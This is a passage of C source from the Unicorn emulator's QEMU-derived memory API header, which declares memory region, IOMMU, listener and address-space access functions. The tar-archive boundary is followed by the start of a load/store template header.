hwaddr addr, unsigned size, bool is_write, MemTxAttrs attrs); } valid; /* Internal implementation constraints: */ struct { /* If nonzero, specifies the minimum size implemented. Smaller sizes * will be rounded upwards and a partial result will be returned. */ unsigned min_access_size; /* If nonzero, specifies the maximum size implemented. Larger sizes * will be done as a series of accesses with smaller sizes. */ unsigned max_access_size; /* If true, unaligned accesses are supported. Otherwise all accesses * are converted to (possibly multiple) naturally aligned accesses. */ bool unaligned; } impl; }; enum IOMMUMemoryRegionAttr { IOMMU_ATTR_SPAPR_TCE_FD }; /** * IOMMUMemoryRegionClass: * * All IOMMU implementations need to subclass TYPE_IOMMU_MEMORY_REGION * and provide an implementation of at least the @translate method here * to handle requests to the memory region. Other methods are optional. * * The IOMMU implementation must use the IOMMU notifier infrastructure * to report whenever mappings are changed, by calling * memory_region_notify_iommu() (or, if necessary, by calling * memory_region_notify_one() for each registered notifier). * * Conceptually an IOMMU provides a mapping from input address * to an output TLB entry. If the IOMMU is aware of memory transaction * attributes and the output TLB entry depends on the transaction * attributes, we represent this using IOMMU indexes. Each index * selects a particular translation table that the IOMMU has: * @attrs_to_index returns the IOMMU index for a set of transaction attributes * @translate takes an input address and an IOMMU index * and the mapping returned can only depend on the input address and the * IOMMU index. * * Most IOMMUs don't care about the transaction attributes and support * only a single IOMMU index. A more complex IOMMU might have one index * for secure transactions and one for non-secure transactions. */ typedef struct IOMMUMemoryRegionClass { /* * Return a TLB entry that contains a given address. * * The IOMMUAccessFlags indicated via @flag are optional and may * be specified as IOMMU_NONE to indicate that the caller needs * the full translation information for both reads and writes. If * the access flags are specified then the IOMMU implementation * may use this as an optimization, to stop doing a page table * walk as soon as it knows that the requested permissions are not * allowed. If IOMMU_NONE is passed then the IOMMU must do the * full page table walk and report the permissions in the returned * IOMMUTLBEntry. (Note that this implies that an IOMMU may not * return different mappings for reads and writes.) * * The returned information remains valid while the caller is * holding the big QEMU lock or is inside an RCU critical section; * if the caller wishes to cache the mapping beyond that it must * register an IOMMU notifier so it can invalidate its cached * information when the IOMMU mapping changes. * * @iommu: the IOMMUMemoryRegion * @hwaddr: address to be translated within the memory region * @flag: requested access permissions * @iommu_idx: IOMMU index for the translation */ IOMMUTLBEntry (*translate)(IOMMUMemoryRegion *iommu, hwaddr addr, IOMMUAccessFlags flag, int iommu_idx); /* Returns minimum supported page size in bytes. * If this method is not provided then the minimum is assumed to * be TARGET_PAGE_SIZE. * * @iommu: the IOMMUMemoryRegion */ uint64_t (*get_min_page_size)(IOMMUMemoryRegion *iommu); /* Get IOMMU misc attributes. This is an optional method that * can be used to allow users of the IOMMU to get implementation-specific * information. The IOMMU implements this method to handle calls * by IOMMU users to memory_region_iommu_get_attr() by filling in * the arbitrary data pointer for any IOMMUMemoryRegionAttr values that * the IOMMU supports. If the method is unimplemented then * memory_region_iommu_get_attr() will always return -EINVAL. * * @iommu: the IOMMUMemoryRegion * @attr: attribute being queried * @data: memory to fill in with the attribute data * * Returns 0 on success, or a negative errno; in particular * returns -EINVAL for unrecognized or unimplemented attribute types. */ int (*get_attr)(IOMMUMemoryRegion *iommu, enum IOMMUMemoryRegionAttr attr, void *data); /* Return the IOMMU index to use for a given set of transaction attributes. * * Optional method: if an IOMMU only supports a single IOMMU index then * the default implementation of memory_region_iommu_attrs_to_index() * will return 0. * * The indexes supported by an IOMMU must be contiguous, starting at 0. * * @iommu: the IOMMUMemoryRegion * @attrs: memory transaction attributes */ int (*attrs_to_index)(IOMMUMemoryRegion *iommu, MemTxAttrs attrs); /* Return the number of IOMMU indexes this IOMMU supports. * * Optional method: if this method is not provided, then * memory_region_iommu_num_indexes() will return 1, indicating that * only a single IOMMU index is supported. * * @iommu: the IOMMUMemoryRegion */ int (*num_indexes)(IOMMUMemoryRegion *iommu); } IOMMUMemoryRegionClass; /** MemoryRegion: * * A struct representing a memory region. */ struct MemoryRegion { /* private: */ /* The following fields should fit in a cache line */ bool ram; bool subpage; bool readonly; /* For RAM regions */ bool is_iommu; RAMBlock *ram_block; const MemoryRegionOps *ops; void *opaque; MemoryRegion *container; Int128 size; hwaddr addr; void (*destructor)(MemoryRegion *mr); uint64_t align; bool terminates; bool enabled; int32_t priority; QTAILQ_HEAD(, MemoryRegion) subregions; QTAILQ_ENTRY(MemoryRegion) subregions_link; struct uc_struct *uc; uint32_t perms; hwaddr end; }; struct IOMMUMemoryRegion { MemoryRegion parent_obj; QLIST_HEAD(, IOMMUNotifier) iommu_notify; IOMMUNotifierFlag iommu_notify_flags; IOMMUMemoryRegionClass cc; }; #define MEMORY_REGION(obj) ((MemoryRegion *)obj) #define IOMMU_MEMORY_REGION(obj) ((IOMMUMemoryRegion *)obj) #define IOMMU_MEMORY_REGION_CLASS(klass) ((IOMMUMemoryRegionClass *)klass) #define IOMMU_MEMORY_REGION_GET_CLASS(obj) (&((IOMMUMemoryRegion *)obj)->cc) #define IOMMU_NOTIFIER_FOREACH(n, mr) \ QLIST_FOREACH((n), &(mr)->iommu_notify, node) /** * MemoryListener: callbacks structure for updates to the physical memory map * * Allows a component to adjust to changes in the guest-visible memory map. * Use with memory_listener_register() and memory_listener_unregister(). */ struct MemoryListener { /** * @begin: * * Called at the beginning of an address space update transaction. * Followed by calls to #MemoryListener.region_add(), * #MemoryListener.region_del(), #MemoryListener.region_nop(), * #MemoryListener.log_start() and #MemoryListener.log_stop() in * increasing address order. * * @listener: The #MemoryListener. */ void (*begin)(MemoryListener *listener); /** * @commit: * * Called at the end of an address space update transaction, * after the last call to #MemoryListener.region_add(), * #MemoryListener.region_del() or #MemoryListener.region_nop(), * #MemoryListener.log_start() and #MemoryListener.log_stop(). * * @listener: The #MemoryListener. */ void (*commit)(MemoryListener *listener); /** * @region_add: * * Called during an address space update transaction, * for a section of the address space that is new in this address space * space since the last transaction. * * @listener: The #MemoryListener. * @section: The new #MemoryRegionSection. */ void (*region_add)(MemoryListener *listener, MemoryRegionSection *section); /** * @region_del: * * Called during an address space update transaction, * for a section of the address space that has disappeared in the address * space since the last transaction. * * @listener: The #MemoryListener. * @section: The old #MemoryRegionSection. */ void (*region_del)(MemoryListener *listener, MemoryRegionSection *section); /** * @region_nop: * * Called during an address space update transaction, * for a section of the address space that is in the same place in the address * space as in the last transaction. * * @listener: The #MemoryListener. * @section: The #MemoryRegionSection. */ void (*region_nop)(MemoryListener *listener, MemoryRegionSection *section); /* private: */ AddressSpace *address_space; QTAILQ_ENTRY(MemoryListener) link; QTAILQ_ENTRY(MemoryListener) link_as; }; /** * AddressSpace: describes a mapping of addresses to #MemoryRegion objects */ struct AddressSpace { /* private: */ MemoryRegion *root; /* Accessed via RCU. */ struct FlatView *current_map; QTAILQ_HEAD(, MemoryListener) listeners; QTAILQ_ENTRY(AddressSpace) address_spaces_link; struct uc_struct *uc; }; typedef struct AddressSpaceDispatch AddressSpaceDispatch; typedef struct FlatRange FlatRange; /* Flattened global view of current active memory hierarchy. Kept in sorted * order. */ struct FlatView { unsigned ref; FlatRange *ranges; unsigned nr; unsigned nr_allocated; struct AddressSpaceDispatch *dispatch; MemoryRegion *root; }; static inline FlatView *address_space_to_flatview(AddressSpace *as) { return as->current_map; } /** * MemoryRegionSection: describes a fragment of a #MemoryRegion * * @mr: the region, or %NULL if empty * @fv: the flat view of the address space the region is mapped in * @offset_within_region: the beginning of the section, relative to @mr's start * @size: the size of the section; will not exceed @mr's boundaries * @offset_within_address_space: the address of the first byte of the section * relative to the region's address space * @readonly: writes to this section are ignored */ struct MemoryRegionSection { Int128 size; MemoryRegion *mr; FlatView *fv; hwaddr offset_within_region; hwaddr offset_within_address_space; bool readonly; }; static inline bool MemoryRegionSection_eq(MemoryRegionSection *a, MemoryRegionSection *b) { return a->mr == b->mr && a->fv == b->fv && a->offset_within_region == b->offset_within_region && a->offset_within_address_space == b->offset_within_address_space && int128_eq(a->size, b->size) && a->readonly == b->readonly; } /** * memory_region_init: Initialize a memory region * * The region typically acts as a container for other memory regions. Use * memory_region_add_subregion() to add subregions. * * @mr: the #MemoryRegion to be initialized * @size: size of the region; any subregions beyond this size will be clipped */ void memory_region_init(struct uc_struct *uc, MemoryRegion *mr, uint64_t size); /** * memory_region_ref: Add 1 to a memory region's reference count * * Whenever memory regions are accessed outside the BQL, they need to be * preserved against hot-unplug. MemoryRegions actually do not have their * own reference count; they piggyback on a QOM object, their "owner". * This function adds a reference to the owner. * * All MemoryRegions must have an owner if they can disappear, even if the * device they belong to operates exclusively under the BQL. This is because * the region could be returned at any time by memory_region_find, and this * is usually under guest control. * * @mr: the #MemoryRegion */ void memory_region_ref(MemoryRegion *mr); /** * memory_region_init_io: Initialize an I/O memory region. * * Accesses into the region will cause the callbacks in @ops to be called. * if @size is nonzero, subregions will be clipped to @size. * * @mr: the #MemoryRegion to be initialized. * @ops: a structure containing read and write callbacks to be used when * I/O is performed on the region. * @opaque: passed to the read and write callbacks of the @ops structure. * @size: size of the region. */ void memory_region_init_io(struct uc_struct *uc, MemoryRegion *mr, const MemoryRegionOps *ops, void *opaque, uint64_t size); /** * memory_region_init_ram_ptr: Initialize RAM memory region from a * user-provided pointer. Accesses into the * region will modify memory directly. * * @mr: the #MemoryRegion to be initialized. * @size: size of the region. * @ptr: memory to be mapped; must contain at least @size bytes. * * Note that this function does not do anything to cause the data in the * RAM memory region to be migrated; that is the responsibility of the caller. */ void memory_region_init_ram_ptr(struct uc_struct *uc, MemoryRegion *mr, uint64_t size, void *ptr); /** * memory_region_init_ram - Initialize RAM memory region. Accesses into the * region will modify memory directly. * * @mr: the #MemoryRegion to be initialized * TYPE_DEVICE or a subclass of TYPE_DEVICE, or NULL) * @size: size of the region in bytes * * This function allocates RAM for a board model or device, and * arranges for it to be migrated (by calling vmstate_register_ram() * if @owner is a DeviceState, or vmstate_register_ram_global() if * @owner is NULL). * * TODO: Currently we restrict @owner to being either NULL (for * global RAM regions with no owner) or devices, so that we can * give the RAM block a unique name for migration purposes. * We should lift this restriction and allow arbitrary Objects. * If you pass a non-NULL non-device @owner then we will assert. */ void memory_region_init_ram(struct uc_struct *uc, MemoryRegion *mr, uint64_t size, uint32_t perms); /** * memory_region_size: get a memory region's size. * * @mr: the memory region being queried. */ uint64_t memory_region_size(MemoryRegion *mr); /** * memory_region_is_ram: check whether a memory region is random access * * Returns %true if a memory region is random access. * * @mr: the memory region being queried */ static inline bool memory_region_is_ram(MemoryRegion *mr) { return mr->ram; } /** * memory_region_get_iommu: check whether a memory region is an iommu * * Returns pointer to IOMMUMemoryRegion if a memory region is an iommu, * otherwise NULL. * * @mr: the memory region being queried */ static inline IOMMUMemoryRegion *memory_region_get_iommu(MemoryRegion *mr) { if (mr->is_iommu) { return (IOMMUMemoryRegion *) mr; } return NULL; } /** * memory_region_get_iommu_class_nocheck: returns iommu memory region class * if an iommu or NULL if not * * Returns pointer to IOMMUMemoryRegionClass if a memory region is an iommu, * otherwise NULL. This is fast path avoiding QOM checking, use with caution. * * @iommu_mr: the memory region being queried */ static inline IOMMUMemoryRegionClass *memory_region_get_iommu_class_nocheck( IOMMUMemoryRegion *iommu_mr) { return &iommu_mr->cc; } /** * memory_region_from_host: Convert a pointer into a RAM memory region * and an offset within it. * * Given a host pointer inside a RAM memory region (created with * memory_region_init_ram() or memory_region_init_ram_ptr()), return * the MemoryRegion and the offset within it. * * Use with care; by the time this function returns, the returned pointer is * not protected by RCU anymore. If the caller is not within an RCU critical * section and does not hold the iothread lock, it must have other means of * protecting the pointer, such as a reference to the region that includes * the incoming ram_addr_t. * * @ptr: the host pointer to be converted * @offset: the offset within memory region */ MemoryRegion *memory_region_from_host(struct uc_struct *uc, void *ptr, ram_addr_t *offset); /** * memory_region_set_readonly: Turn a memory region read-only (or read-write) * * Allows a memory region to be marked as read-only (turning it into a ROM). * only useful on RAM regions. * * @mr: the region being updated. * @readonly: whether rhe region is to be ROM or RAM. */ void memory_region_set_readonly(MemoryRegion *mr, bool readonly); /** * memory_region_get_ram_ptr: Get a pointer into a RAM memory region. * * Returns a host pointer to a RAM memory region (created with * memory_region_init_ram() or memory_region_init_ram_ptr()). * * Use with care; by the time this function returns, the returned pointer is * not protected by RCU anymore. If the caller is not within an RCU critical * section and does not hold the iothread lock, it must have other means of * protecting the pointer, such as a reference to the region that includes * the incoming ram_addr_t. * * @mr: the memory region being queried. */ void *memory_region_get_ram_ptr(MemoryRegion *mr); /** * memory_region_add_subregion: Add a subregion to a container. * * Adds a subregion at @offset. The subregion may not overlap with other * subregions (except for those explicitly marked as overlapping). A region * may only be added once as a subregion (unless removed with * memory_region_del_subregion()); use memory_region_init_alias() if you * want a region to be a subregion in multiple locations. * * @mr: the region to contain the new subregion; must be a container * initialized with memory_region_init(). * @offset: the offset relative to @mr where @subregion is added. * @subregion: the subregion to be added. */ void memory_region_add_subregion(MemoryRegion *mr, hwaddr offset, MemoryRegion *subregion); /** * memory_region_add_subregion_overlap: Add a subregion to a container * with overlap. * * Adds a subregion at @offset. The subregion may overlap with other * subregions. Conflicts are resolved by having a higher @priority hide a * lower @priority. Subregions without priority are taken as @priority 0. * A region may only be added once as a subregion (unless removed with * memory_region_del_subregion()); use memory_region_init_alias() if you * want a region to be a subregion in multiple locations. * * @mr: the region to contain the new subregion; must be a container * initialized with memory_region_init(). * @offset: the offset relative to @mr where @subregion is added. * @subregion: the subregion to be added. * @priority: used for resolving overlaps; highest priority wins. */ void memory_region_add_subregion_overlap(MemoryRegion *mr, hwaddr offset, MemoryRegion *subregion, int priority); /** * memory_region_filter_subregions: filter subregios by priority. * * remove all subregions beginning by a specified subregion */ void memory_region_filter_subregions(MemoryRegion *mr, int32_t level); /** * memory_region_get_ram_addr: Get the ram address associated with a memory * region * * @mr: the region to be queried */ ram_addr_t memory_region_get_ram_addr(MemoryRegion *mr); /** * memory_region_del_subregion: Remove a subregion. * * Removes a subregion from its container. * * @mr: the container to be updated. * @subregion: the region being removed; must be a current subregion of @mr. */ void memory_region_del_subregion(MemoryRegion *mr, MemoryRegion *subregion); /** * memory_region_find: translate an address/size relative to a * MemoryRegion into a #MemoryRegionSection. * * Locates the first #MemoryRegion within @mr that overlaps the range * given by @addr and @size. * * Returns a #MemoryRegionSection that describes a contiguous overlap. * It will have the following characteristics: * - @size = 0 iff no overlap was found * - @mr is non-%NULL iff an overlap was found * * Remember that in the return value the @offset_within_region is * relative to the returned region (in the .@mr field), not to the * @mr argument. * * Similarly, the .@offset_within_address_space is relative to the * address space that contains both regions, the passed and the * returned one. However, in the special case where the @mr argument * has no container (and thus is the root of the address space), the * following will hold: * - @offset_within_address_space >= @addr * - @offset_within_address_space + .@size <= @addr + @size * * @mr: a MemoryRegion within which @addr is a relative address * @addr: start of the area within @as to be searched * @size: size of the area to be searched */ MemoryRegionSection memory_region_find(MemoryRegion *mr, hwaddr addr, uint64_t size); /** * memory_listener_register: register callbacks to be called when memory * sections are mapped or unmapped into an address * space * * @listener: an object containing the callbacks to be called * @filter: if non-%NULL, only regions in this address space will be observed */ void memory_listener_register(MemoryListener *listener, AddressSpace *filter); /** * memory_listener_unregister: undo the effect of memory_listener_register() * * @listener: an object containing the callbacks to be removed */ void memory_listener_unregister(MemoryListener *listener); /** * memory_region_dispatch_read: perform a read directly to the specified * MemoryRegion. * * @mr: #MemoryRegion to access * @addr: address within that region * @pval: pointer to uint64_t which the data is written to * @op: size, sign, and endianness of the memory operation * @attrs: memory transaction attributes to use for the access */ MemTxResult memory_region_dispatch_read(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t *pval, MemOp op, MemTxAttrs attrs); /** * memory_region_dispatch_write: perform a write directly to the specified * MemoryRegion. * * @mr: #MemoryRegion to access * @addr: address within that region * @data: data to write * @op: size, sign, and endianness of the memory operation * @attrs: memory transaction attributes to use for the access */ MemTxResult memory_region_dispatch_write(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t data, MemOp op, MemTxAttrs attrs); /** * address_space_init: initializes an address space * * @as: an uninitialized #AddressSpace * @root: a #MemoryRegion that routes addresses for the address space */ void address_space_init(struct uc_struct *uc, AddressSpace *as, MemoryRegion *root); /** * address_space_destroy: destroy an address space * * Releases all resources associated with an address space. After an address space * is destroyed, its root memory region (given by address_space_init()) may be destroyed * as well. * * @as: address space to be destroyed */ void address_space_destroy(AddressSpace *as); /** * address_space_remove_listeners: unregister all listeners of an address space * * Removes all callbacks previously registered with memory_listener_register() * for @as. * * @as: an initialized #AddressSpace */ void address_space_remove_listeners(AddressSpace *as); /** * address_space_rw: read from or write to an address space. * * Return a MemTxResult indicating whether the operation succeeded * or failed (eg unassigned memory, device rejected the transaction, * IOMMU fault). * * @as: #AddressSpace to be accessed * @addr: address within that address space * @attrs: memory transaction attributes * @buf: buffer with the data transferred * @len: the number of bytes to read or write * @is_write: indicates the transfer direction */ MemTxResult address_space_rw(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len, bool is_write); /** * address_space_write: write to address space. * * Return a MemTxResult indicating whether the operation succeeded * or failed (eg unassigned memory, device rejected the transaction, * IOMMU fault). * * @as: #AddressSpace to be accessed * @addr: address within that address space * @attrs: memory transaction attributes * @buf: buffer with the data transferred * @len: the number of bytes to write */ MemTxResult address_space_write(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, const void *buf, hwaddr len); /** * address_space_write_rom: write to address space, including ROM. * * This function writes to the specified address space, but will * write data to both ROM and RAM. This is used for non-guest * writes like writes from the gdb debug stub or initial loading * of ROM contents. * * Note that portions of the write which attempt to write data to * a device will be silently ignored -- only real RAM and ROM will * be written to. * * Return a MemTxResult indicating whether the operation succeeded * or failed (eg unassigned memory, device rejected the transaction, * IOMMU fault). * * @as: #AddressSpace to be accessed * @addr: address within that address space * @attrs: memory transaction attributes * @buf: buffer with the data transferred * @len: the number of bytes to write */ MemTxResult address_space_write_rom(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, const void *buf, hwaddr len); /* address_space_ld*: load from an address space * address_space_st*: store to an address space * * These functions perform a load or store of the byte, word, * longword or quad to the specified address within the AddressSpace. * The _le suffixed functions treat the data as little endian; * _be indicates big endian; no suffix indicates "same endianness * as guest CPU". * * The "guest CPU endianness" accessors are deprecated for use outside * target-* code; devices should be CPU-agnostic and use either the LE * or the BE accessors. * * @as #AddressSpace to be accessed * @addr: address within that address space * @val: data value, for stores * @attrs: memory transaction attributes * @result: location to write the success/failure of the transaction; * if NULL, this information is discarded */ #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX UNICORN_ARCH_POSTFIX #else #define SUFFIX #endif #define ARG1 as #define ARG1_DECL AddressSpace *as #include "exec/memory_ldst.inc.h" #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX UNICORN_ARCH_POSTFIX #else #define SUFFIX #endif #define ARG1 as #define ARG1_DECL AddressSpace *as #include "exec/memory_ldst_phys.inc.h" struct MemoryRegionCache { void *ptr; hwaddr xlat; hwaddr len; FlatView *fv; MemoryRegionSection mrs; bool is_write; }; #define MEMORY_REGION_CACHE_INVALID ((MemoryRegionCache) { .mrs.mr = NULL }) /* address_space_ld*_cached: load from a cached #MemoryRegion * address_space_st*_cached: store into a cached #MemoryRegion * * These functions perform a load or store of the byte, word, * longword or quad to the specified address. The address is * a physical address in the AddressSpace, but it must lie within * a #MemoryRegion that was mapped with address_space_cache_init. * * The _le suffixed functions treat the data as little endian; * _be indicates big endian; no suffix indicates "same endianness * as guest CPU". * * The "guest CPU endianness" accessors are deprecated for use outside * target-* code; devices should be CPU-agnostic and use either the LE * or the BE accessors. * * @cache: previously initialized #MemoryRegionCache to be accessed * @addr: address within the address space * @val: data value, for stores * @attrs: memory transaction attributes * @result: location to write the success/failure of the transaction; * if NULL, this information is discarded */ #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX glue(_cached_slow, UNICORN_ARCH_POSTFIX) #else #define SUFFIX _cached_slow #endif #define ARG1 cache #define ARG1_DECL MemoryRegionCache *cache #include "exec/memory_ldst.inc.h" /* Inline fast path for direct RAM access. */ #ifdef UNICORN_ARCH_POSTFIX static inline uint8_t glue(address_space_ldub_cached, UNICORN_ARCH_POSTFIX)(struct uc_struct *uc, MemoryRegionCache *cache, #else static inline uint8_t address_space_ldub_cached(struct uc_struct *uc, MemoryRegionCache *cache, #endif hwaddr addr, MemTxAttrs attrs, MemTxResult *result) { assert(addr < cache->len); if (likely(cache->ptr)) { return ldub_p((char *)cache->ptr + addr); } else { #ifdef UNICORN_ARCH_POSTFIX return glue(address_space_ldub_cached_slow, UNICORN_ARCH_POSTFIX)(uc, cache, addr, attrs, result); #else return address_space_ldub_cached_slow(uc, cache, addr, attrs, result); #endif } } #ifdef UNICORN_ARCH_POSTFIX static inline void glue(address_space_stb_cached, UNICORN_ARCH_POSTFIX)(struct uc_struct *uc, MemoryRegionCache *cache, #else static inline void address_space_stb_cached(struct uc_struct *uc, MemoryRegionCache *cache, #endif hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result) { assert(addr < cache->len); if (likely(cache->ptr)) { stb_p((char *)cache->ptr + addr, val); } else { #ifdef UNICORN_ARCH_POSTFIX glue(address_space_stb_cached_slow, UNICORN_ARCH_POSTFIX)(uc, cache, addr, val, attrs, result); #else address_space_stb_cached_slow(uc, cache, addr, val, attrs, result); #endif } } #define ENDIANNESS _le #include "exec/memory_ldst_cached.inc.h" #define ENDIANNESS _be #include "exec/memory_ldst_cached.inc.h" #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX glue(_cached, UNICORN_ARCH_POSTFIX) #else #define SUFFIX _cached #endif #define ARG1 cache #define ARG1_DECL MemoryRegionCache *cache #include "exec/memory_ldst_phys.inc.h" /* address_space_translate: translate an address range into an address space * into a MemoryRegion and an address range into that section. Should be * called from an RCU critical section, to avoid that the last reference * to the returned region disappears after address_space_translate returns. * * @fv: #FlatView to be accessed * @addr: address within that address space * @xlat: pointer to address within the returned memory region section's * #MemoryRegion. * @len: pointer to length * @is_write: indicates the transfer direction * @attrs: memory attributes */ MemoryRegion *flatview_translate(struct uc_struct *uc, FlatView *fv, hwaddr addr, hwaddr *xlat, hwaddr *len, bool is_write, MemTxAttrs attrs); static inline MemoryRegion *address_space_translate(AddressSpace *as, hwaddr addr, hwaddr *xlat, hwaddr *len, bool is_write, MemTxAttrs attrs) { return flatview_translate(as->uc, address_space_to_flatview(as), addr, xlat, len, is_write, attrs); } /* address_space_access_valid: check for validity of accessing an address * space range * * Check whether memory is assigned to the given address space range, and * access is permitted by any IOMMU regions that are active for the address * space. * * For now, addr and len should be aligned to a page size. This limitation * will be lifted in the future. * * @as: #AddressSpace to be accessed * @addr: address within that address space * @len: length of the area to be checked * @is_write: indicates the transfer direction * @attrs: memory attributes */ bool address_space_access_valid(AddressSpace *as, hwaddr addr, hwaddr len, bool is_write, MemTxAttrs attrs); /* address_space_map: map a physical memory region into a host virtual address * * May map a subset of the requested range, given by and returned in @plen. * May return %NULL if resources needed to perform the mapping are exhausted. * Use only for reads OR writes - not for read-modify-write operations. * Use cpu_register_map_client() to know when retrying the map operation is * likely to succeed. * * @as: #AddressSpace to be accessed * @addr: address within that address space * @plen: pointer to length of buffer; updated on return * @is_write: indicates the transfer direction * @attrs: memory attributes */ void *address_space_map(AddressSpace *as, hwaddr addr, hwaddr *plen, bool is_write, MemTxAttrs attrs); /* address_space_unmap: Unmaps a memory region previously mapped by address_space_map() * * Will also mark the memory as dirty if @is_write == %true. @access_len gives * the amount of memory that was actually read or written by the caller. * * @as: #AddressSpace used * @buffer: host pointer as returned by address_space_map() * @len: buffer length as returned by address_space_map() * @access_len: amount of data actually transferred * @is_write: indicates the transfer direction */ void address_space_unmap(AddressSpace *as, void *buffer, hwaddr len, bool is_write, hwaddr access_len); /* Internal functions, part of the implementation of address_space_read. */ MemTxResult address_space_read_full(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len); MemTxResult flatview_read_continue(struct uc_struct *, FlatView *fv, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len, hwaddr addr1, hwaddr l, MemoryRegion *mr); void *qemu_map_ram_ptr(struct uc_struct *uc, RAMBlock *ram_block, ram_addr_t addr); static inline bool memory_access_is_direct(MemoryRegion *mr, bool is_write) { if (is_write) { return memory_region_is_ram(mr) && !mr->readonly; } else { return memory_region_is_ram(mr); } } /** * address_space_read: read from an address space. * * Return a MemTxResult indicating whether the operation succeeded * or failed (eg unassigned memory, device rejected the transaction, * IOMMU fault). Called within RCU critical section. * * @as: #AddressSpace to be accessed * @addr: address within that address space * @attrs: memory transaction attributes * @buf: buffer with the data transferred * @len: length of the data transferred */ #ifndef _MSC_VER static inline __attribute__((__always_inline__)) #else static inline #endif MemTxResult address_space_read(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len) { MemTxResult result = MEMTX_OK; #ifndef _MSC_VER hwaddr l, addr1; void *ptr; MemoryRegion *mr; FlatView *fv; if (__builtin_constant_p(len)) { if (len) { fv = address_space_to_flatview(as); l = len; mr = flatview_translate(as->uc, fv, addr, &addr1, &l, false, attrs); if (len == l && memory_access_is_direct(mr, false)) { ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1); memcpy(buf, ptr, len); } else { result = flatview_read_continue(as->uc, fv, addr, attrs, buf, len, addr1, l, mr); } } } else { result = address_space_read_full(as, addr, attrs, buf, len); } #else result = address_space_read_full(as, addr, attrs, buf, len); #endif return result; } #ifdef NEED_CPU_H /* enum device_endian to MemOp. */ static inline MemOp devend_memop(enum device_endian end) { QEMU_BUILD_BUG_ON(DEVICE_HOST_ENDIAN != DEVICE_LITTLE_ENDIAN && DEVICE_HOST_ENDIAN != DEVICE_BIG_ENDIAN); #if defined(HOST_WORDS_BIGENDIAN) != defined(TARGET_WORDS_BIGENDIAN) /* Swap if non-host endianness or native (target) endianness */ return (end == DEVICE_HOST_ENDIAN) ? 0 : MO_BSWAP; #else const int non_host_endianness = DEVICE_LITTLE_ENDIAN ^ DEVICE_BIG_ENDIAN ^ DEVICE_HOST_ENDIAN; /* In this case, native (target) endianness needs no swap. */ return (end == non_host_endianness) ? MO_BSWAP : 0; #endif } #endif MemoryRegion *memory_map(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms); MemoryRegion *memory_map_ptr(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms, void *ptr); MemoryRegion *memory_map_io(struct uc_struct *uc, ram_addr_t begin, size_t size, uc_cb_mmio_read_t read_cb, uc_cb_mmio_write_t write_cb, void *user_data_read, void *user_data_write); MemoryRegion *memory_cow(struct uc_struct *uc, MemoryRegion *parrent, hwaddr begin, size_t size); void memory_unmap(struct uc_struct *uc, MemoryRegion *mr); void memory_moveout(struct uc_struct *uc, MemoryRegion *mr); void memory_movein(struct uc_struct *uc, MemoryRegion *mr); int memory_free(struct uc_struct *uc); #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/memory_ldst.inc.h���������������������������������������������������0000664�0000000�0000000�00000007627�14675241067�0022015�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Physical memory access templates * * Copyright (c) 2003 Fabrice Bellard * Copyright (c) 2015 Linaro, Inc. * Copyright (c) 2016 Red Hat, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifdef TARGET_ENDIANNESS extern uint32_t glue(address_space_lduw, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint32_t glue(address_space_ldl, SUFFIX)(struct uc_struct *, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint64_t glue(address_space_ldq, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stl_notdirty, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stw, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stl, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stq, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val, MemTxAttrs attrs, MemTxResult *result); #else extern uint32_t glue(address_space_ldub, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint32_t glue(address_space_lduw_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint32_t glue(address_space_lduw_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint32_t glue(address_space_ldl_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint32_t glue(address_space_ldl_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint64_t glue(address_space_ldq_le, 